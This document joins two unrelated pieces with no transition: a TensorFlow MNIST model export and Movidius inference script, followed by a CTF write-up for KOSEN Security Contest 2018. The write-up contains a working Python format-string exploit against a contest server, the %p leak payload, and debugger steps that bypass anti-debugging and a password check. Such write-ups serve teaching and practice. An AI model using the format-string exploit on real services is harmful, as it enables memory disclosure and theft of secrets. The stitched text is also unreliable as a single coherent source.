from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
import tempfile


def deepnn(x):
    with tf.name_scope('reshape'):
        x_image = tf.reshape(x, [-1, 28, 28, 1])  # -1 = number of x
    with tf.name_scope('conv1'):
        W_conv1 = weight_variable([5, 5, 1, 32])
        b_conv1 = bias_variable([32])
        h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
    with tf.name_scope('pool1'):
        h_pool1 = max_pool_2x2(h_conv1)
    with tf.name_scope('conv2'):
        W_conv2 = weight_variable([5, 5, 32, 64])
        b_conv2 = bias_variable([64])
        h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
    with tf.name_scope('pool1'):
        h_pool2 = max_pool_2x2(h_conv2)
    with tf.name_scope('fc1'):
        W_fc1 = weight_variable([7 * 7 * 64, 1024])
        b_fc1 = bias_variable([1024])
        h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
        h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
    with tf.name_scope('fc2'):
        W_fc2 = weight_variable([1024, 10])
        b_fc2 = bias_variable([10])
        y_conv = tf.matmul(h_fc1, W_fc2) + b_fc2
    return y_conv


def conv2d(x, W):
    return tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')


def max_pool_2x2(x):
    return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')


def weight_variable(shape):
    initial = tf.truncated_normal(shape, stddev=0.1)  # random
    return tf.Variable(initial)


def bias_variable(shape):
    initial = tf.constant(0.1, shape=shape)  # all 0.1
    return tf.Variable(initial)


def main():
    x = tf.placeholder(tf.float32, [None, 784], name='input')
    y_conv = deepnn(x)
    output = tf.nn.softmax(y_conv, name='output')
    saver = tf.train.Saver()
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        sess.run(tf.local_variables_initializer())
        saver.restore(sess, '.' + '/output/mnist_model')
        saver.save(sess, '.' + '/output/mnist_inference')


main()
Compile
mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph
If the input and output nodes are named input and output, the -in and -on options may not be necessary.
Inference on Movidius
import mvnc.mvncapi as mvnc
import numpy as np
from PIL import Image
import cv2
import time, sys, os
import glob

IMAGE_DIR_NAME = './JPEGImages/pickup/'
#IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images'


def predict(input):
    print("Start prediting ...")
    devices = mvnc.EnumerateDevices()
    device = mvnc.Device(devices[0])
    device.OpenDevice()

    # Load graph file data
    with open('./output/mnist_inference.graph', 'rb') as f:
        graph_file_buffer = f.read()

    # Initialize a Graph object
    graph = device.AllocateGraph(graph_file_buffer)

    start = time.time()
    for i in range(len(input)):
        # Write the tensor to the input_fifo and queue an inference
        graph.LoadTensor(input[i], None)
        output, userobj = graph.GetResult()
        print(np.argmax(output), end=' ')
    stop = time.time()
    print('')
    print("Time : {0} ({1} images)".format(stop-start, len(input)))

    graph.DeallocateGraph()
    device.CloseDevice()
    return output


if __name__ == '__main__':
    print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg')))
    jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg'))
    if not len(jpg_list):
        print("No image file")
        sys.exit()
    jpg_list.reverse()
    print([i.split('/')[-1] for i in jpg_list])

    img_list = []
    for n in jpg_list:
        image = cv2.imread(n)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        # Invert so that digits are white on a black background, as in MNIST
        image = cv2.bitwise_not(image)
        # Keep the resized image (28x28 is the size the network expects)
        image = cv2.resize(image, (28, 28))
        img_list.append(image)

    # Scale pixel values from [0, 255] to [0, 1]
    img_list = np.asarray(img_list)[:10] * (1.0/255.0)
    print("imgshape ", img_list.shape)
    predict(img_list.astype(np.float16))
KOSEN Security Contest 2018 Write-Up
I'm writing this write-up in English for a friend who has just started CTF. English is not my strong suit, so please bear with me.
KOSEN Security Contest 2018 was held from September 1st to 2nd. It is a CTF for Kosen students.
I entered the contest with members of my laboratory and my juniors. Our team name was 074m4K053n, and we finished in 3rd place (3rd of 36 teams).
I solved the following questions.
- [Sample] 100 Sample
- [Binary] 100 printf
- [Binary] 200 XOR, XOR
- [Binary] 250 Simple anti debugger
- [Network] 150 Login and Get flag
- [Web] 100 Steal a information from Server
- [Web] 300 Steal a account
- [Misc] 50 I don't wanna see HITO OOSUGI
- [Misc] 100 No disc space
I'll explain these questions below.
00 [Sample] 100 Sample
[Question]
CTF is a competition in which you find answers called "flags".
The flag format is SCKOSEN{foobar}.
For practice, submit the current Japanese era as the flag.
example :
SHOWA (1926 - 1989) -> SCKOSEN{SHOWA}
MEIJI (1868 - 1912 ) -> SCKOSEN{MEIJI}
TAISHO (1912 - 1926) -> SCKOSEN{TAISHO}
[Solution]
This is a sample question.
The current Japanese era is Heisei (1989 - 2019).
So the flag is SCKOSEN{HEISEI}.
03 [Binary] 100 printf
[Question]
Steal the flag!
How to connect to the game: nc [foobar] [port] (example: nc 27.133.152.42 80)
[Solution]
Run the sample command and you get the following output.
$ nc 27.133.152.42 80
Secret is in 0xffc9a37e
What do you want:
Type "Earth" and you get the following output.
$ nc 27.133.152.42 80
the secret is in 0xffc9a37e
what do you want: Earth
there is no Earth
Type "AAAA" followed by a run of ",%p" and you get:
the secret is in 0xff985c6e
what do you want: AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
there is no AAAA,0x100,0xf7ed65c0,(nil),(nil),(nil),(nil),0x43530000,0x45534f4b,0x73757b4e,0x72705f65,0x66746e69,0x726f635f,0x74636572,0x7d796c,0x41414141,0x2c70252c,0x252c7025,0x70252c70,0x2c70252c,0x252c7025
As the result shows, we can leak several values from memory by using %p, so a Format String Attack is possible.
Let's look at the result again.
AAAA,
0x100,
0xf7ed65c0,
(nil),
(nil),
(nil),
(nil),
0x43530000,
0x45534f4b,
0x73757b4e,
0x72705f65,
0x66746e69,
0x726f635f,
0x74636572,
0x7d796c,
0x41414141,
We can find 0x41414141 ("AAAA" written in ASCII) at the 15th position. This 0x41414141 is the string I sent.
So if we send an address instead of "AAAA", we can read the value stored at that address.
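As a side check, the words at positions 7 to 14 of the leak look like printable ASCII. The following minimal sketch decodes them as little-endian 32-bit values (the byte order of a 32-bit x86 target). It only uses the values printed above; the helper name words_to_bytes is made up for this illustration.

```python
import struct

# Words 7 to 14 of the %p leak shown above.
leaked = [0x43530000, 0x45534f4b, 0x73757b4e, 0x72705f65,
          0x66746e69, 0x726f635f, 0x74636572, 0x7d796c]


def words_to_bytes(words):
    """Pack 32-bit words as little-endian bytes, in stack order."""
    return b"".join(struct.pack("<I", w) for w in words)


raw = words_to_bytes(leaked)
# Drop the NUL padding around the string before decoding.
text = raw.strip(b"\x00").decode("ascii")
print(text)  # SCKOSEN{use_printf_correctly}
```

The string starts two bytes into the first word, which matches the secret address ending in 0x...e rather than a 4-byte-aligned value. The %15$s approach described here is still the general technique, since it works even when the secret is not sitting on the stack.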
Attack string :
{secret address}, %15$s
We can get {secret address} from the line "the secret is in 0xff985c6e".
Here is the Python script:
#!/usr/bin/env python2
import socket
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('27.133.152.42', 80))
res = s.recv(4096)
res += s.recv(4096)
print(res)
# The fifth whitespace-separated token is the leaked secret address
addr = int(res.split()[4], 16)
#buf = "AAAA"
buf = struct.pack("<I", addr)
#buf += ',%p' * 20
buf += ',%15$s'
buf += '\n'
s.send(buf)
print(buf)
res = s.recv(4096)
res += s.recv(4096)
res += s.recv(4096)
print(res)
s.close()
And here is the result:
the secret is in 0xffc0b52e
what do you want:
.���,%15$sthere is no .���,SCKOSEN{use_printf_correctly}
04 [Binary] 200 XOR, XOR
[Question]
Read the assembly and get the flag!
[Solution]
There is a file named "asmreading".
First, check the file with the file command.
$ file ./asmreading
asmreading: ELF 32-bit LSB pie executable Intel 80386 ........... , not stripped
It's an ELF executable file.
Next, use the GDB debugger to disassemble the main function.
We can see ASCII codes and xor_func, so xor_func seems to be a decoding function.
To check that, set a breakpoint after the call to xor_func and run the executable.
Then we can find the decoded flag.
The flag is SCKOSEN{you_can_read_assembly}. (But I didn't actually read the assembly ...)
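For readers new to this kind of challenge, here is a minimal sketch of what an XOR decoding routine typically does. The write-up does not show the actual xor_func, so the key, the repeating-key scheme, and the sample bytes below are all hypothetical and are not taken from the binary.

```python
def xor_bytes(data, key):
    """XOR every byte of data with a repeating key (XOR is its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


key = b"\x5a"                 # hypothetical single-byte key
plain = b"SCKOSEN{example}"   # placeholder text, not the real flag bytes
encoded = xor_bytes(plain, key)
decoded = xor_bytes(encoded, key)

print(encoded)
print(decoded)
```

Because applying the same XOR twice restores the original bytes, letting the program run its own decoder and reading memory afterwards (as done with the breakpoint above) gives the same result as reimplementing the routine by hand.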
05 [Binary] 250 Simple anti debugger
[Question]
I attached to it with GDB, but it doesn't work.
How can I analyze it?
[Solution]
There is a file named "simple_anti_debugger".
First, check the file with the file command.
$ file ./simple_anti_debugger
simple_anti_debugger: ELF 32-bit LSB pie executable Intel 80386 ........... , not stripped
It's an ELF executable file.
Next, use the GDB debugger. At first I couldn't run the binary under the debugger because of an anti-debugging technique.
So first, look at the function list. There is a detect_debugger function. Let's try to bypass it.
In the detect_debugger function, the eax register is compared with 0xffffff. If eax is 0xffffff, the program jumps to the exit code.
To avoid that, I change the value in eax.
Now we can use the debugger in the main function.
Change eax again to bypass the password check.
Then we get the flag. The flag is SCKOSEN{I_like_debugger}.
I'll write up the other questions later.....
*1: '27.133.152.42', 80